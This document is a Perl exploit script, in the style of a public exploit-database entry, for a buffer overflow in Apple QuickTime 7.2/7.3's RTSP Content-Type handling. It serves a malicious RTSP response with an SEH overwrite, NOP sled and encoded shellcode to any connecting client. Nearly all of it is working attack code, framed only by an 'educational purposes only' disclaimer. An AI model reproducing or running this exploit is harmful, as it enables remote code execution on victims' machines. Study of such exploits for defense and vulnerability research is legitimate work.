# Exploit Title: Apple QuickTime 7.2/7.3 RTSP BOF (Perl)# Date: 2009-01-06# Author: Jacky# Software Link: [downoad link if available]# Version: 7.2/7.3# Tested on: Windows XP SP3# CVE : [if exists]# Code :#Apple QuickTime 7.2/7.3 RTSP BOF (Perl Edition )#Discovered by (Krystian Kloskowski (h07) <h07@interia.pl>)#Written and coded by Jacky!#All Greetz to Peter Van Eeckhoutte and Corelan Team ( Best exploitation team);-)#This time i wrote the exploit in perl , because i saw that it was written#many times in python and ruby only !#This exploit is for EDUCATIONAL PURPOSES ONLY !!!#!/usr/bin/perl -w# (RTSP) Content-Type: [A * 995] + [B * 4096]\r\n## 0x41414141 Pointer to next SEH record# 0x42424242 SE handler
use strict;
use Socket;
my $junk="A"x991;
my $nseh="\xeb\x06\x90\x90";
my $seh="\x4e\x28\x86\x66";#\x4e\x28\x86\x66
my $nops="\x90"x20;
my $shellcode="\x89\xe2\xdd\xc4\xd9\x72\xf4\x58\x50\x59\x49\x49\x49\x49"."\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51"."\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32"."\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"."\x42\x75\x4a\x49\x4b\x4c\x48\x68\x4f\x79\x43\x30\x43\x30"."\x47\x70\x45\x30\x4b\x39\x4d\x35\x50\x31\x49\x42\x45\x34"."\x4e\x6b\x46\x32\x44\x70\x4c\x4b\x50\x52\x44\x4c\x4c\x4b"."\x42\x72\x45\x44\x4c\x4b\x50\x72\x51\x38\x44\x4f\x4f\x47"."\x50\x4a\x47\x56\x46\x51\x49\x6f\x45\x61\x4b\x70\x4c\x6c"."\x45\x6c\x43\x51\x51\x6c\x47\x72\x46\x4c\x47\x50\x4f\x31"."\x4a\x6f\x44\x4d\x46\x61\x49\x57\x4a\x42\x48\x70\x46\x32"."\x46\x37\x4e\x6b\x50\x52\x46\x70\x4c\x4b\x47\x32\x47\x4c"."\x45\x51\x4e\x30\x4e\x6b\x51\x50\x44\x38\x4b\x35\x4b\x70"."\x43\x44\x43\x7a\x46\x61\x4e\x30\x46\x30\x4e\x6b\x50\x48"."\x46\x78\x4c\x4b\x51\x48\x47\x50\x46\x61\x49\x43\x4b\x53"."\x47\x4c\x50\x49\x4c\x4b\x46\x54\x4c\x4b\x46\x61\x48\x56"."\x50\x31\x49\x6f\x50\x31\x49\x50\x4e\x4c\x4f\x31\x48\x4f"."\x44\x4d\x47\x71\x48\x47\x46\x58\x4b\x50\x44\x35\x49\x64"."\x44\x43\x51\x6d\x4a\x58\x47\x4b\x43\x4d\x44\x64\x50\x75"."\x4a\x42\x50\x58\x4e\x6b\x42\x78\x47\x54\x46\x61\x4b\x63"."\x43\x56\x4e\x6b\x44\x4c\x42\x6b\x4c\x4b\x42\x78\x45\x4c"."\x45\x51\x49\x43\x4e\x6b\x44\x44\x4c\x4b\x47\x71\x4e\x30"."\x4c\x49\x43\x74\x44\x64\x44\x64\x43\x6b\x51\x4b\x51\x71"."\x43\x69\x43\x6a\x43\x61\x4b\x4f\x49\x70\x42\x78\x43\x6f"."\x42\x7a\x4e\x6b\x45\x42\x4a\x4b\x4f\x76\x51\x4d\x51\x7a"."\x45\x51\x4e\x6d\x4b\x35\x4d\x69\x43\x30\x47\x70\x47\x70"."\x50\x50\x45\x38\x45\x61\x4c\x4b\x42\x4f\x4e\x67\x4b\x4f"."\x49\x45\x4d\x6b\x49\x6e\x44\x4e\x44\x72\x4b\x5a\x45\x38"."\x4f\x56\x4f\x65\x4d\x6d\x4f\x6d\x49\x6f\x4a\x75\x45\x6c"."\x47\x76\x43\x4c\x46\x6a\x4d\x50\x49\x6b\x49\x70\x44\x35"."\x44\x45\x4f\x4b\x51\x57\x47\x63\x50\x72\x50\x6f\x42\x4a"."\x43\x30\x46\x33\x4b\x4f\x48\x55\x45\x33\x51\x71\x42\x4c"."\x42\x43\x44\x6e\x42\x45\x44\x38\x43\x55\x45\x50\x41\x41";
my $rest="B"x(4096-length($seh.$nops.$shellcode));
my $payload=$junk.$nseh.$seh.$nops.$shellcode.$rest;
my $header = "RTSP/1.0 200 OK\r\n"."CSeq: 1\r\n"."Date: 0x00 :P\r\n"."Content-Base: rtsp://0.0.0.0/1.mp3/\r\n"."Content-Type: $payload\r\n"."Content-Length: 334\r\n"."\r\n";
my $body = "v=0\r\n"."o=- 16689332712 1 IN IP4 0.0.0.0\r\n"."s=MPEG-1 or 2 Audio, streamed by the PoC Exploit o.O\r\n"."i=1.mp3\r\n"."t=0 0\r\n"."a=tool:ciamciaramcia\r\n"."a=type:broadcast\r\n"."a=control:*\r\n"."a=range:npt=0-213.077\r\n"."a=x-qt-text-nam:MPEG-1 or 2 Audio, streamed by the PoC Exploit o.O\r\n"."a=x-qt-text-inf:1.mp3\r\n"."m=audio 0 RTP/AVP 14\r\n"."c=IN IP4 0.0.0.0\r\n"."a=control:track1\r\n";
my $evil=$header.$body;
my $port=shift || 554;
my $proto=getprotobyname('tcp');
socket(SERVER,PF_INET,SOCK_STREAM,$proto);
my $paddr=sockaddr_in($port,INADDR_ANY);
bind(SERVER,$paddr);
listen(SERVER,SOMAXCONN);
print "[+]Listening on [RTSP]554\n";
my $client_addr;while($client_addr=accept(CLIENT,SERVER)){
print CLIENT $evil;
print "[+]Connection Accepted\n";
print "[+]Sending Evil Payload\n";}
close CLIENT;
print "[+]Connection closed\n";